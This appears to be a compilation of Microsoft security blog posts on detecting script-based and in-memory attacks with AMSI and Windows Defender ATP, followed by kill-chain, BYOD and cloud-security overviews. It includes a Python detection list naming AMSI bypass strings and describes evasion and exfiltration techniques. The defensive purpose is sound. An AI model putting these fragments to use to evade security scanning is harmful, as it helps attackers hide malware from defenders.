Figure 4. Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI

PowerShell use by Kovter and other commodity malware

Advanced activity groups like KRYPTON are not the only ones shifting from binary executables to evasive scripts. In the commodity space, Kovter malware uses several processes to eventually execute its malicious payload. This payload resides in a PowerShell script decoded by JavaScript (executed by wscript.exe) and passed to powershell.exe as an environment variable.

Figure 5. Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload

By looking at the PowerShell payload content captured by AMSI, experienced analysts can easily spot similarities to PowerSploit, a publicly available set of penetration testing modules. While such attack techniques involve file-based components, they remain extremely hard to detect using traditional methods because malicious activities occur only in memory. Such behavior, however, is effortlessly detected by Windows Defender ATP using machine learning that combines detailed AMSI signals with signals generated by PowerShell activity in general.

Figure 6. Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis

Fresh machine learning insight with AMSI

While AMSI provides rich information from captured script content, the highly variant nature of malicious scripts continues to make them challenging targets for detection. To efficiently extract and identify new traits differentiating malicious scripts from benign ones, Windows Defender ATP employs advanced machine learning methods.

As outlined in our previous blog, we employ a supervised machine learning classifier to identify breach activity. We build training sets based on malicious behaviors observed in the wild and normal activities on typical machines, augmenting that with data from controlled detonations of malicious artifacts. The diagram below conceptually shows how we capture malicious behaviors in the form of process trees.

Figure 7. Process tree augmented by instrumentation for AMSI data

As shown in the process tree, the kill chain begins with a malicious document that causes Microsoft Word (winword.exe) to launch PowerShell (powershell.exe). In turn, PowerShell executes a heavily obfuscated script that drops and executes the malware fhjUQ72.tmp, which then obtains persistence by adding a run key to the registry. From the process tree, our machine learning systems can extract a variety of features to build expert classifiers for areas like registry modification and file creation, which are then converted into numeric scores that are used to decide whether to raise alerts.
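A minimal sketch of that feature extraction (Python; process names follow the kill chain just described, while the event details and feature names are invented for illustration) flattens the tree into numeric counts an expert classifier could score:

```python
from dataclasses import dataclass, field

@dataclass
class Proc:
    name: str
    events: list = field(default_factory=list)    # e.g. ("registry_set", key), ("file_create", path)
    children: list = field(default_factory=list)

def tree_features(root: Proc) -> dict:
    # Walk the process tree, counting events of interest and tracking depth.
    feats = {"depth": 0, "registry_set": 0, "file_create": 0, "procs": 0}
    def walk(node: Proc, depth: int):
        feats["procs"] += 1
        feats["depth"] = max(feats["depth"], depth)
        for kind, *_ in node.events:
            if kind in feats:
                feats[kind] += 1
        for child in node.children:
            walk(child, depth + 1)
    walk(root, 0)
    return feats

# The kill chain described above, with invented event details:
tmp = Proc("fhjUQ72.tmp", events=[("registry_set", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run")])
ps = Proc("powershell.exe", events=[("file_create", "fhjUQ72.tmp")], children=[tmp])
word = Proc("winword.exe", children=[ps])
print(tree_features(word))  # {'depth': 2, 'registry_set': 1, 'file_create': 1, 'procs': 3}
```

In a real system each counter would feed a dedicated expert classifier (registry modification, file creation, and so on) whose scores are combined into an alerting decision.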

With the instrumentation of AMSI signals added as part of the Windows 10 Fall Creators Update (version 1709), Windows Defender ATP machine learning algorithms can now make use of insight into the unobfuscated script content while continually referencing machine state changes associated with process activity. We’ve also built a variety of script-based models that inspect the nature of executed scripts, such as the count of obfuscation layers, entropy, obfuscation features, n-grams, and specific API invocations, to name a few.
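Two of the features named above, character entropy and n-grams, are straightforward to compute; the Python below is a hedged sketch (the feature choices are illustrative, not Microsoft’s actual models):

```python
import math
from collections import Counter

def shannon_entropy(text: str) -> float:
    # Bits per character; heavily encoded or packed scripts tend to score
    # higher than hand-written code.
    counts = Counter(text)
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def char_ngrams(text: str, n: int = 3) -> Counter:
    # Character trigram frequencies, which models can compare against
    # distributions learned from benign and malicious script corpora.
    return Counter(text[i:i + n] for i in range(len(text) - n + 1))

script = "Write-Output 'hello world'"
features = {
    "entropy": shannon_entropy(script),
    "distinct_trigrams": len(char_ngrams(script)),
    "length": len(script),
}
print(features)
```

Such hand-crafted features complement the learned representations mentioned below, where deep networks pick up patterns a human would not enumerate.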

As AMSI peels off the obfuscation layers, Windows Defender ATP benefits from growing visibility and insight into API calls, variable names, and patterns in the general structure of malicious scripts. And while AMSI data helps improve human expert knowledge and their ability to train learning systems, our deep neural networks automatically learn features that are often hidden from human analysts.

Figure 8. Machine learning detections of JavaScript and PowerShell scripts

While these new script-based machine learning models augment our expert classifiers, we also correlate new results with other behavioral information. For example, Windows Defender ATP correlates the detection of suspicious script contents from AMSI with other proximate behaviors, such as network connections. This contextual information is provided to SecOps personnel, helping them respond to incidents efficiently.

Figure 9. Machine learning combines VBScript content from AMSI and tracked network activity

Detection of AMSI bypass attempts

With AMSI providing powerful insight into malicious script activity, attacks are more likely to incorporate AMSI bypass mechanisms that we group into three categories:

  • Bypasses that are part of the script content and can be inspected and alerted on
  • Tampering with the AMSI sensor infrastructure, which might involve the replacement of system files or manipulation of the load order of relevant DLLs
  • Patching of AMSI instrumentation in memory
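For the first category, bypasses visible in the script content itself, a detector can be as simple as matching known bypass fragments. The sketch below references the well-known amsiInitFailed technique; real products rely on machine learning over many such indicators, and this pattern list is purely illustrative:

```python
import re

# Illustrative signature list; production detection combines many indicators
# with machine learning rather than plain string matching.
BYPASS_PATTERNS = [
    re.compile(r"amsiInitFailed", re.I),
    re.compile(r"\[Ref\]\.Assembly\.GetType\(\s*['\"]System\.Management\.Automation\.AmsiUtils", re.I),
    re.compile(r"AmsiScanBuffer", re.I),
]

def flags_amsi_bypass(script: str) -> bool:
    return any(p.search(script) for p in BYPASS_PATTERNS)

benign = "Get-ChildItem C:\\Users | Sort-Object Length"
suspicious = "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
print(flags_amsi_bypass(benign), flags_amsi_bypass(suspicious))  # False True
```

The second and third categories cannot be caught this way at all, which is why the anti-tampering heuristics described next fire in the cloud before a bypass can suppress them.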

The Windows Defender ATP research team proactively develops anti-tampering mechanisms for all our sensors. We have devised heuristic alerts for possible manipulation of our optics, designing these alerts so that they are triggered in the cloud before the bypass can suppress them.

During actual attacks involving CVE-2017-8759, Windows Defender ATP not only detected malicious post-exploitation scripting activity but also detected attempts to bypass AMSI using code similar to one identified by Matt Graeber.

Figure 10. Windows Defender ATP alert based on AMSI bypass pattern

AMSI itself captured the following bypass code for analysis in the Windows Defender ATP cloud.

Figure 11. AMSI bypass code sent to the cloud for analysis

Conclusion: Windows Defender ATP machine learning and AMSI provide revolutionary defense against highly evasive script-based attacks

Provided as an open interface on Windows 10, Antimalware Scan Interface delivers powerful optics into malicious activity hidden in encrypted and obfuscated scripts that are oftentimes never written to disk. Such evasive use of scripts is becoming commonplace and is being employed by both highly skilled activity groups and authors of commodity malware.

AMSI captures malicious script behavior by looking at script content as it is interpreted, without having to check physical files or being hindered by obfuscation, encryption, or polymorphism. At the endpoint, AMSI benefits local scanners, providing the necessary optics so that even obfuscated and encrypted scripts can be inspected for malicious content. Windows Defender Antivirus, specifically, utilizes AMSI to dynamically inspect and block scripts responsible for dropping all kinds of malicious payloads, including ransomware and banking trojans.

With Windows 10 Fall Creators Update (1709), newly added script runtime instrumentation provides unparalleled visibility into script behaviors despite obfuscation. Windows Defender Antivirus uses this treasure trove of behavioral information about malicious scripts to deliver pre-breach protection at runtime. To deliver post-breach defense, Windows Defender ATP uses advanced machine learning systems to draw deeper insight from this data.

Apart from looking at specific activities and patterns of activities, new machine learning algorithms in Windows Defender ATP look at script obfuscation layers, API invocation patterns, and other features that can be used to efficiently identify malicious scripts heuristically. Windows Defender ATP also correlates script-based indicators with other proximate activities, so it can deliver even richer contextual information about suspected breaches.

To benefit from the new script runtime instrumentation and other powerful security enhancements like Windows Defender Exploit Guard, customers are encouraged to install Windows 10 Fall Creators Update.

Read The Total Economic Impact of Microsoft Windows Defender Advanced Threat Protection from Forrester to understand the significant cost savings and business benefits enabled by Windows Defender ATP. To directly experience how Windows Defender ATP can help your enterprise detect, investigate, and respond to advanced attacks, sign up for a free trial.


Stefan Sellmer, Windows Defender ATP Research


Shay Kels, Windows Defender ATP Research

Karthik Selvaraj, Windows Defender Research


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.


Detecting reflective DLL loading with Windows Defender ATP

November 13th, 2017 No comments

Today’s attacks put emphasis on leaving little, if any, forensic evidence to maintain stealth and achieve persistence. Attackers use methods that allow exploits to stay resident within an exploited process or migrate to a long-lived process without ever creating or relying on a file on disk. In recent blogs we described how attackers use basic cross-process migration or advanced techniques like atom bombing and process hollowing to avoid detection.

Reflective Dynamic-Link Library (DLL) loading, which can load a DLL into a process memory without using the Windows loader, is another method used by attackers.

In-memory DLL loading was first described in 2004 by Skape and JT, who illustrated how one can patch the Windows loader to load DLLs from memory instead of from disk. In 2008, Stephen Fewer of Harmony Security introduced the reflective DLL loading process that loads a DLL into a process without being registered with the process. Modern attacks now use this technique to avoid detection.

Reflective DLL loading isn’t trivial; it requires writing the DLL into memory and then resolving its imports and/or relocating it. To reflectively load DLLs, one needs to author one’s own custom loader.

However, attackers are still motivated to not use the Windows loader, as most legitimate applications would, for two reasons:

  1. Unlike when using the Windows loader (which is invoked by calling the LoadLibrary function), reflectively loading a DLL doesn’t require the DLL to reside on disk. As such, an attacker can exploit a process, map the DLL into memory, and then reflectively load the DLL without first saving it to disk.
  2. Because it’s not saved on disk, a library that is loaded this way may not be readily visible without forensic analysis (e.g., inspecting whether executable memory has content resembling executable code).

Instrumentation and detection

A crucial aspect of reflectively loading a DLL is to have executable memory available for the DLL code. This can be accomplished by taking existing memory and changing its protection flags or by allocating new executable memory. Memory procured for DLL code is the primary signal we use to identify reflective DLL loading.

In Windows 10 Creators Update, we instrumented function calls related to procuring executable memory, namely VirtualAlloc and VirtualProtect, which generate signals for Windows Defender Advanced Threat Protection (Windows Defender ATP). Based on this instrumentation, we’ve built a model that detects reflective DLL loading in a broad range of high-risk processes, for example, browsers and productivity software.

The model takes a two-pronged approach, as illustrated in Figure 1:

  1. First, the model learns about the normal allocations of a process. As a simplified example, we observe that a process like Winword.exe allocates page-aligned executable memory of size 4,000 with particular execution characteristics. Only a select few threads within the Winword process allocate memory in this way.
  2. Second, we find that a process associated with malicious activity (e.g., executing a malicious macro or exploit) allocates executable memory that deviates from the normal behavior.

Figure 1. Memory allocations observed by a process running normally vs. allocations observed during malicious activity

This model shows that we can use memory events as the primary signal for detecting reflective DLL loading. In our real model, we incorporate a broad set of other features, such as allocation size, allocation history, thread information, allocation flags, etc. We also consider the fact that application behavior varies greatly because of other factors like plugins, so we add other behavioral signals like network connection behavior to increase the effectiveness of our detection.
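The two-pronged model can be caricatured in a few lines of Python (the process name echoes the Winword example above; sizes, protection strings, and the frequency threshold are invented): learn which executable allocations are normal for a process image, then flag what deviates.

```python
from collections import defaultdict

class AllocationBaseline:
    """Toy baseline model: an executable allocation is anomalous for a process
    if its (size, protection) shape has rarely or never been seen before."""
    def __init__(self, min_seen: int = 3):
        self.seen = defaultdict(int)   # (process, size, protection) -> count
        self.min_seen = min_seen

    def observe(self, process: str, size: int, protection: str):
        self.seen[(process, size, protection)] += 1

    def is_anomalous(self, process: str, size: int, protection: str) -> bool:
        return self.seen[(process, size, protection)] < self.min_seen

model = AllocationBaseline()
for _ in range(50):  # training phase: Winword's usual page-aligned allocations
    model.observe("winword.exe", 4096, "PAGE_EXECUTE_READ")

print(model.is_anomalous("winword.exe", 4096, "PAGE_EXECUTE_READ"))          # False
print(model.is_anomalous("winword.exe", 120832, "PAGE_EXECUTE_READWRITE"))   # True
```

The real model folds in far more context (allocation history, thread information, allocation flags, network behavior), but the core idea is the same: memory events are the primary signal.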

Detecting reflective DLL Loading

Let’s show how Windows Defender ATP can detect reflective DLL loading used with a common technique in modern threats: social engineering. In this attack, the target victim opens a Microsoft Word document from a file share. The victim is tricked into running a macro like the code shown in Figure 2. (Note: A variety of mechanisms allow customers to mitigate this kind of attack at the onset; in addition, several upcoming Office security features further protect from this attack.)

Figure 2. Malicious macro

When the macro code runs, the Microsoft Word process reaches out to the command-and-control (C&C) server specified by the attacker, and receives the content of the DLL to be reflectively loaded. Once the DLL is reflectively loaded, it connects to the C&C and provides command line access to the victim machine.

Note that the DLL is not part of the original document and does not ever touch the disk. Other than the initial document with the small macro snippet, the rest of the attack happens in memory. Memory forensics reveals that there are several larger RWX sections mapped into the Microsoft Word process without a corresponding DLL, as shown in Figure 3. These are the memory sections where the reflectively loaded DLL resides.

Figure 3. Large RWX memory sections in Microsoft Word process upon opening malicious document and executing malicious macro

Windows Defender ATP identifies the memory allocations as abnormal and raises an alert, as shown in Figure 4. The alert provides context on the document, along with information on command-and-control communication, which can allow security operations personnel to assess the scope of the attack and start containing the breach.

Figure 4. Example alert on WDATP

Microsoft Office 365 Advanced Threat Protection protects customers against similar attacks using dynamic behavior matching. In attacks like this, SecOps personnel would see an Office 365 ATP behavioral detection like that shown in Figure 5 in Office 365’s Threat Explorer page.

Figure 5. Example Office 365 ATP detection

Conclusion: Windows Defender ATP uncovers in-memory attacks

Windows 10 continues to strengthen defense capabilities against the full range of modern attacks. In this blog post, we illustrated how Windows Defender ATP detects the reflective DLL loading technique. Security operations personnel can use the alerts in Windows Defender ATP to quickly identify and respond to attacks in corporate networks.

Windows Defender ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect the invariant techniques used in attacks. Enhanced instrumentation and detection capabilities in Windows Defender ATP can better expose covert attacks.

Windows Defender ATP also provides detailed event timelines and other contextual information that SecOps teams can use to understand attacks and quickly respond. The improved functionality in Windows Defender ATP enables them to isolate the victim machine and protect the rest of the network.

For more information about Windows Defender ATP, check out its features and capabilities and read about why a post-breach detection approach is a key component of any enterprise security strategy. Windows Defender ATP is built into the core of Windows 10 Enterprise and can be evaluated free of charge.


Christian Seifert

Windows Defender ATP Research




Disrupting the kill chain

This post is authored by Jonathan Trull, Worldwide Executive Cybersecurity Advisor, Enterprise Cybersecurity Group.

The cyber kill chain describes the typical workflow, including techniques, tactics, and procedures or TTPs, used by attackers to infiltrate an organization’s networks and systems.  The Microsoft Global Incident Response and Recovery (GIRR) Team and Enterprise Threat Detection Service, Microsoft’s managed cyber threat detection service, identify and respond to thousands of targeted attacks per year.  Based on our experience, the image below illustrates how most targeted cyber intrusions occur today.


The initial attack typically includes the following steps:

  • External recon –  During this stage, the attacker typically searches publicly available sources to identify as much information as possible about their target.  This will include information about the target’s IP address range, business operations and supply chain, employees, executives, and technology utilized.  The goal of this stage is to develop sufficient intelligence to increase the chances of a successful attack. If the attacker has previously penetrated your environment, they may also refer to intelligence gathered during previous incursions.
  • Compromised machine – Attackers continue to use socially engineered attacks to gain an initial foothold on their victim’s network.  Why?  Because these attacks, especially if targeted and based on good intelligence, have an extremely high rate of success.  At this stage, the attacker will send a targeted phishing email to a carefully selected employee within the organization.  The email will either contain a malicious attachment or a link directing the recipient to a watering hole.  Once the user executes the attachment or visits the watering hole, another malicious tool known as a backdoor will be installed on the victim’s computer giving the attacker remote control of the computer.
  • Internal Recon and Lateral Movement – Now that the attacker has a foothold within the organization’s network, he or she will begin gathering information not previously available externally.  This will include performing host discovery scans, mapping internal networks and systems, and attempting to mount network shares.  The attacker will also begin using freely available yet extremely effective tools like Mimikatz and WCE to harvest credentials stored locally on the initially compromised machine and begin planning the next stage of the attack as shown below.


  • Domain Dominance – At this stage, the attacker will attempt to elevate their level of access to a higher trusted status within the network.  The attacker’s ultimate goal is to access your data, and the privileged credentials of a domain administrator offer them many ways to access your valuable data stores.  Once this occurs, the attacker will begin to pivot throughout the network, either looking for valuable data or installing ransomware for future extortion attempts, or both.
  • Data Consolidation and Exfiltration – Now that the attacker has access to the valuable data within the organization’s systems, he or she must consolidate it, package it up, and send it out of the network without being detected or blocked.  This is typically accomplished by encrypting the data and transferring it to an external system controlled by the attacker using approved network protocols like DNS, FTP, and SFTP or Internet-based file transfer solutions.

Microsoft Secure and Productive Enterprise

The Microsoft Secure and Productive Enterprise is a suite of product offerings that have been purposely built to disrupt this cyber attack kill chain while still ensuring an organization’s employees remain productive.  Below, I briefly describe how each of these technologies disrupts the kill chain:

  • Office 365 Advanced Threat Protection – This technology is designed to disrupt the “initial compromise” stage and raise the cost of successfully using phishing attacks.
    Most attackers leverage phishing emails containing malicious attachments or links pointing to watering hole sites. Advanced Threat Protection (ATP) in Office 365 provides protection against both known and unknown malware and viruses in email, provides real-time (time-of-click) protection against malicious URLs, as well as enhanced reporting and trace capabilities.  Messages and attachments are not only scanned against signatures powered by multiple antimalware engines and intelligence from Microsoft’s Intelligent Security Graph, but are also routed to a special detonation chamber, run, and the results analyzed with machine learning and advanced analysis techniques for signs of malicious behavior to detect and block threats. Enhanced reporting capabilities also make it possible for security teams to quickly identify and respond to email based attacks when they occur.
  • Windows 10 –  This technology disrupts the compromised machine and lateral movement stages by raising the difficulty of successfully compromising and retaining control of a user’s PC and by protecting the accounts and credentials stored and used on the device.
    If an attacker still manages to deliver malware through to one of the organization’s employees by some other mechanism (e.g., via personal email), Windows 10’s security features are designed to both stop the initial infection and, if infected, prevent further lateral movement. Specifically, Windows Defender Application Guard uses new, hardware-based virtualization technology to wrap a protective border around the Edge browser.  Even if malware executes within the browser, it cannot access the underlying operating system and is cleaned from the machine once the browser is closed.  Windows Device Guard provides an extra layer of protection to ensure that only trusted programs are loaded and run, preventing the execution of malicious programs, and Windows Credential Guard uses the same hardware-based virtualization technology discussed earlier to prevent attackers who manage to gain an initial foothold from obtaining other credentials stored on the endpoint.  And finally, Windows Defender Advanced Threat Protection is the DVR for your company’s security team.  It provides a near real-time recording of everything occurring on your endpoints and uses built-in signatures, machine learning, deep file analysis through detonation as a service, and the power of the Microsoft Intelligent Security Graph to detect threats.  It also provides security teams with remote access to critical forensic data needed to investigate complex attacks.
  • Microsoft Advanced Threat Analytics – This technology disrupts the lateral movement phase by detecting lateral movement attack techniques early, allowing for rapid response.
    If an attacker still manages to get through the above defenses, compromise credentials, and move laterally, the Microsoft Advanced Threat Analytics (ATA) solution provides a robust set of capabilities to detect this stage of an attack.  ATA uses both detection of known attack techniques as well as user-based analytics that learns what is “normal” for your environment so it can spot anomalies that indicate an attack. Microsoft ATA can detect internal recon attempts such as DNS enumeration, use of compromised credentials like access attempts during abnormal times, lateral movement (Pass-the-Ticket, Pass-the-Hash, etc.), privilege escalation (forged PAC), and domain dominance activities (skeleton key malware, golden tickets, remote execution).
  • Azure Security Center – While Microsoft ATA detects cyber attacks occurring within an organization’s data centers, Azure Security Center extends this level of protection into the cloud.
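
As a rough illustration of the user-behavior analytics described above, here is a minimal sketch of how a detector might learn each user’s typical login hours and flag sign-ins at abnormal times. This is an invented toy model, not ATA’s actual algorithm:

```python
from collections import defaultdict

class LoginAnomalyDetector:
    """Toy sketch of behavior-based detection: learn each user's typical
    login hours during a baseline period, then flag logins that fall
    outside the learned window."""

    def __init__(self):
        # user -> set of hours (0-23) at which logins were observed
        self.baseline = defaultdict(set)

    def learn(self, user, hour):
        """Record a login hour observed during the learning period."""
        self.baseline[user].add(hour)

    def is_anomalous(self, user, hour):
        """Unknown users and never-before-seen hours count as anomalies."""
        seen = self.baseline[user]
        return not seen or hour not in seen
```

A real system would of course use far richer signals (source machine, resource accessed, protocol) and statistical scoring rather than exact set membership.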

And now for the best part.  As shown in the image below, each of the above listed technologies is designed to work seamlessly together and provide security teams with visibility across the entire kill chain.


Each of these technologies also leverages the power of the Microsoft Intelligent Security Graph, which includes cyber threat intelligence collected from Microsoft’s products and services, to provide the most comprehensive and accurate detections.

  • Cloud App Security, Intune, Azure Information Protection, and Windows 10 Information Protection – And finally, the Microsoft Secure and Productive Enterprise Suite provides significant capabilities to classify and protect data and prevent its loss. Among other capabilities, Microsoft Cloud App Security can identify and control the use of unsanctioned cloud applications. This helps organizations prevent data loss, whether from an attack or a rogue employee, via cloud-based applications. Intune and Windows 10 Information Protection prevent corporate data from being intermingled with personal data or used by unsanctioned applications, whether on a Windows 10 device or on iOS- or Android-based mobile devices. And finally, Azure Information Protection provides organizations and their employees with the ability to classify and protect data using digital rights management technology. Organizations can now implement and enforce a need-to-know strategy, thereby significantly reducing the amount of unencrypted data available should an attacker gain access to their network.

Finally, Microsoft’s Enterprise Cybersecurity Group (ECG) also offers a range of both proactive and reactive services that leverage the capabilities of the Secure and Productive Enterprise suite in combination with the Intelligent Security Graph to help companies detect, respond to, and recover from attacks.

In the coming weeks, I will be following up with blogs and demos that go deeper into each of the above listed technologies and discuss how companies can most effectively integrate these solutions into their security strategies, operations, and existing technologies. To learn more about Microsoft technologies, visit Microsoft Secure.

Categories: Cloud Computing, cybersecurity Tags:

Securing the new BYOD frontline: Mobile apps and data

With personal smartphones, tablets, and laptops becoming ubiquitous in the workplace, bring your own device (BYOD) strategies and security measures have evolved. The frontlines have shifted from the devices themselves to the apps and data residing on—or accessed through—them.

Mobile devices and cloud-based apps have undeniably transformed the way businesses operate. But they also introduce new security and compliance risks that must be understood and mitigated. When personal and corporate apps are intermingled on the same device, how can organizations remain compliant and protected while giving employees the best productivity experience? And when corporate information is dispersed among disparate, often unmanaged locations, how can organizations make sure sensitive data is always secured?

Traditional perimeter solutions have proved to be inadequate in keeping up with the stream of new apps available to users. And newer point solutions either require multiple vendors or are just too complex and time-consuming for IT teams to implement. Companies need a comprehensive, integrated method for protecting information—regardless of where it is stored, how it is accessed, or with whom it is shared.

Microsoft’s end-to-end information protection solutions can help reconcile the disparity between user productivity and enterprise compliance and protection. Our identity and access management solutions integrate with existing infrastructure systems to protect access to applications and resources across corporate data centers and in the cloud.

The following Microsoft solutions and technologies provide access control on several levels, offering ample coverage that can be up and running with the simple click of a button:

Identity and access management

Simplify user access with identity-based single sign-on (SSO). Azure Active Directory Premium (Azure AD) syncs with existing on-premises directories to simplify access to any application—even those in the cloud—with a secured, unified identity. No more juggling multiple combinations of user names and passwords. Users sign in only once using an authenticated corporate ID, then receive a token enabling access to resources as long as the token is valid. Azure AD comes pre-integrated with thousands of popular SaaS apps and works seamlessly with iOS, Android, Windows, and PC devices to deliver multi-platform access. Not only does unified identity with SSO simplify user access, it can also reduce the overhead costs associated with operating and maintaining multiple user accounts.
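
To make the token mechanics concrete, here is a hedged sketch of the general pattern: a signed token carrying an expiry, accepted only while the signature verifies and the token is unexpired. Azure AD actually issues standards-based tokens (e.g., SAML or OAuth/JWT); the key, format, and field names below are illustrative only:

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = b"demo-signing-key"  # hypothetical key, for this sketch only

def issue_token(user, ttl_seconds=3600, now=None):
    """Mint a signed token carrying the user and an expiry timestamp."""
    now = time.time() if now is None else now
    payload = json.dumps({"sub": user, "exp": now + ttl_seconds}).encode()
    sig = hmac.new(SECRET, payload, hashlib.sha256).hexdigest()
    return base64.b64encode(payload).decode() + "." + sig

def validate_token(token, now=None):
    """Return the user if the signature matches and the token is unexpired,
    otherwise None."""
    now = time.time() if now is None else now
    body, sig = token.rsplit(".", 1)
    payload = base64.b64decode(body)
    expected = hmac.new(SECRET, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None
    claims = json.loads(payload)
    return claims["sub"] if claims["exp"] > now else None
```

The point of the pattern is that every downstream application can check the token locally, so the user authenticates once and reuses the result everywhere until it expires.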

Secure and compliant mobile devices

Microsoft Intune manages and protects devices, corporate apps, and data on almost any personal or corporate-owned device. Through Intune mobile device management (MDM) capabilities, IT teams can create and define compliance policies to meet specific business requirements, deploy policies to users or devices, and monitor device and/or user compliance from a single administration console. Intune compliance policies deliver complete visibility into users’ device health, and enable IT to block or restrict access if the device becomes non-compliant. IT administrators also have the option to install device settings that perform remote actions, such as passcode reset, device lock, data encryption, or full wipe of a lost, stolen, or non-compliant device.
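
As an illustration of how compliance policy evaluation might look in principle, the sketch below checks a device against a policy and reports which requirements fail. The field names are invented for the example, not actual Intune schema:

```python
def evaluate_compliance(device, policy):
    """Return the list of policy requirements the device fails.
    An empty list means the device is compliant; a non-empty list is the
    kind of result an admin console could use to block or restrict access."""
    failures = []
    if policy.get("require_encryption") and not device.get("encrypted"):
        failures.append("encryption")
    # OS versions are represented as tuples, e.g. (10, 2), so they compare
    # component-by-component rather than as strings.
    if policy.get("min_os_version") and device.get("os_version", (0,)) < policy["min_os_version"]:
        failures.append("os_version")
    if policy.get("block_jailbroken") and device.get("jailbroken"):
        failures.append("jailbroken")
    return failures
```

A monitoring loop would run this per enrolled device and surface the failure list as the “device health” view described above.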

Conditional access

Microsoft Intune can also help reinforce access protection by verifying the health of users and devices prior to granting privileges with conditional access policies. Intune policies evaluate user and device health by assessing factors like IP range, the user’s group enrollment, and if the device is managed by Intune and compliant with policies set by administrators. During the policy verification process, Intune blocks the user’s access until the device is encrypted, a passcode is set, and the device is no longer jailbroken or rooted. Intune integrates with cloud services like Office 365 and Exchange to confirm device health and grant access based on health results.
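
The decision logic described above can be sketched roughly as follows. The group names, trusted network ranges, and outcome labels are assumptions made for illustration; this is not Intune’s actual policy engine:

```python
import ipaddress

def conditional_access(user_groups, device_compliant, device_managed, client_ip,
                       trusted_networks=("10.0.0.0/8", "192.168.0.0/16"),
                       allowed_groups=frozenset({"employees"})):
    """Evaluate the factors named above: group enrollment, device
    management/compliance state, and client IP range. Returns an
    illustrative decision string."""
    ip = ipaddress.ip_address(client_ip)
    on_trusted_net = any(ip in ipaddress.ip_network(n) for n in trusted_networks)
    if not allowed_groups & set(user_groups):
        return "deny: group"
    if not (device_managed and device_compliant):
        return "deny: device"
    if not on_trusted_net:
        return "challenge: mfa"  # off-network access triggers extra auth
    return "allow"
```

The useful property of this shape is that access is recomputed on every request, so a device drifting out of compliance loses access immediately rather than at the next audit.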

Multi-factor authentication

Multi-factor authentication is a feature built into Azure Active Directory that provides an additional layer of authentication to help make sure only the right people have the right access to corporate applications. It prevents unauthorized access to on-premises and cloud apps with additional authentication required, and offers flexible enforcement based on user, device, or app to reduce compliance risks.
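
For a concrete sense of what a second authentication factor involves, here is a minimal time-based one-time password (TOTP) check in the spirit of RFC 6238. Azure Multi-Factor Authentication supports several methods (phone call, text message, app notification), so this is only one illustrative mechanism, and a production check would also tolerate some clock skew:

```python
import hashlib
import hmac
import struct
import time

def totp(secret: bytes, now=None, step=30, digits=6):
    """Derive a time-based one-time password: HMAC the current 30-second
    window counter, then truncate to a fixed number of decimal digits."""
    counter = int((time.time() if now is None else now) // step)
    msg = struct.pack(">Q", counter)
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def verify_second_factor(secret, submitted_code, now=None):
    """The second factor passes only when the submitted code matches the
    code for the current time window."""
    return hmac.compare_digest(totp(secret, now), submitted_code)
```

Because the code depends on a shared secret and the current time window, a stolen password alone is not enough to sign in.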

To learn more about BYOD security, download the free eBook, Protect Your Data: 7 Ways to Improve Your Security Posture


Managing cloud security: Four key questions to evaluate your security position

As cloud computing and the Internet of Things (IoT) continue to transform the global economy, businesses recognize that securing enterprise data must be viewed as an ongoing process. Securing the ever-expanding volume, variety, and sources of data is not easy; however, with an adaptive mindset, you can achieve persistent and effective cloud security.

The first step is knowing the key risk areas in cloud computing and IoT processes and assessing whether and where your organization may be exposed to data leaks. File sharing solutions improve the way people collaborate but pose a serious point of vulnerability. Mobile workforces decentralize data storage and dissolve traditional business perimeters.

SaaS solutions turn authentication and user identification into an always-on and always-changing topic. Second, it’s worth developing the habit—if you haven’t already—of reviewing and adapting cloud security strategy as an ongoing capability. To that end, here are eight key questions to revisit regularly, four of which we dive deeper into below.


Is your security budget scaling appropriately?

Security teams routinely manage numerous security solutions on a daily basis and typically monitor thousands of security alerts. At the same time, they need to keep rapid response practices sharp and ready for deployment in case of a breach. Organizations must regularly verify that sufficient funds are allocated to cover day-to-day security operations as well as rapid, ad hoc responses if and when a breach is detected.

Do you have both visibility into and control of critical business data?

With potential revenue loss from a single breach in the tens of millions of dollars, preventing data leaks is a central pillar of cloud security strategy. Regularly review how, when, where, and by whom your business data is being accessed. Monitoring whether permissions are appropriate for a user’s role and responsibilities as well as for different types of data must be constant.

Are you monitoring shadow IT adequately?

Today, the average employee uses 17 cloud apps, and mobile users access company resources from a wide variety of locations and devices. Remote and mobile work coupled with the increasing variety of cloud-based solutions (often free) raises concerns that traditional on-premises security tools and policies may not provide the level of visibility and control you need. Check whether you can identify mobile device and cloud application users on your network, and monitor changes in usage behavior. To mitigate risks of an accidental data breach, teach current and onboarding employees your organization’s best practices for using ad hoc apps and access.
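
One simple way to gain visibility into shadow IT is to mine outbound proxy logs for traffic to cloud apps that are not on the sanctioned list. The sketch below is illustrative (the sanctioned list and log format are hypothetical) and tallies unsanctioned domains by request count and distinct users:

```python
from collections import Counter

SANCTIONED = {"sharepoint.com", "salesforce.com"}  # example allow-list

def discover_shadow_it(proxy_log):
    """proxy_log: iterable of (user, app_domain) tuples.
    Returns [(domain, request_count, distinct_users), ...] for domains
    outside the sanctioned list, busiest first."""
    unsanctioned = Counter()
    users = {}
    for user, domain in proxy_log:
        if domain not in SANCTIONED:
            unsanctioned[domain] += 1
            users.setdefault(domain, set()).add(user)
    return [(d, c, len(users[d])) for d, c in unsanctioned.most_common()]
```

Tools like Microsoft Cloud App Security automate this kind of discovery at scale and enrich it with app risk ratings, but the underlying idea is the same.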

Is your remote access security policy keeping up?

Traditional remote access technologies build a direct channel between external users and your apps, and that makes it risky to publish internal apps to external users. Your organization needs a secure remote access strategy that will help you manage and protect corporate resources as cloud solutions, platforms, and infrastructures evolve. Consider using automated and adaptive policies to reduce time and resources needed to identify and validate risks.


